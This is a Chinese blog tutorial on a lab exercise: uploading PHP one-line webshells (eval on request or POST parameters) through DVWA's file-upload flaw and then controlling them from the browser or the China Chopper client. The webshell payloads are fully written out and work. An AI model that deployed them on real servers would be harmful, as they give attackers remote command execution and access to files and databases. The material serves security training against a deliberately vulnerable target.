Web安全_文件上传漏洞_DVWA上传shell+中国菜刀管理文件

远程登陆靶机:

  1. 打开kali命令行
  2. ssh 账号@地址
  3. 输入密码
  4. 成功连接
    在这里插入图片描述
    这时就可以输入命令对靶机进行操作,如查看、删除文件、进入目录等等
    如这里进入靶机里DVWA上传文件目录处查看所上传的文件:
    在这里插入图片描述
    可以查看到有四个文件,可以进行删除(这里删除php后缀的文件,防止对之后的实验干扰)使用rm 文件命令

1、上传一句话木马
一句话木马主要为系统函数,php主要为eval、system、shell_exec、assert函数等
eval函数可分为两种

  • 在浏览器进行操作
<?php eval($_REQUEST['cmd']);?>

cmd为参数名可以更换其他名字

  • 在客户端软件(如中国菜刀)进行操作
<?php eval($_POST[pass]);?>

pass为密码,为我们客户端登陆到后台的密码

2.1浏览器操作后台

  • 提前先准备好一个一句话木马文件shell.php,内容为<?php eval($_REQUEST['cmd']);?>
  • 然后打开DVWA文件上传的页面对此木马进行上传
    在这里插入图片描述
    然后将文件路径复制到地址栏中将#覆盖,末尾加?cmd=xxx;
    此时可以对cmd进行传参,如cmd=phpinfo();
    末尾需要记得加分号
    在这里插入图片描述

2.2客户端操作后台

  • 准备好一句话木马文件chopper.php,内容为<?php eval($_POST[abc]);?>我这里将密码改为了abc
  • 然后上传到靶机上,环境为windows7(中国菜刀运行在windows系统下)
  • 上传好文件之后,打开中国菜刀,右键选择添加按照如图进行配置,配置好点击添加
    在这里插入图片描述
  • 添加好了之后,列表中就会有我们刚添加的shell
  • 右键进行选择,可以进行诸如文件管理,数据库管理等等操作
    在这里插入图片描述
    可以看到第一次上传的shell.php和第二次上传的chopper.php

欢迎关注我的微信公众号,后台回复“菜刀”即可获得中国菜刀资源
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/BeatRex/article/details/84302479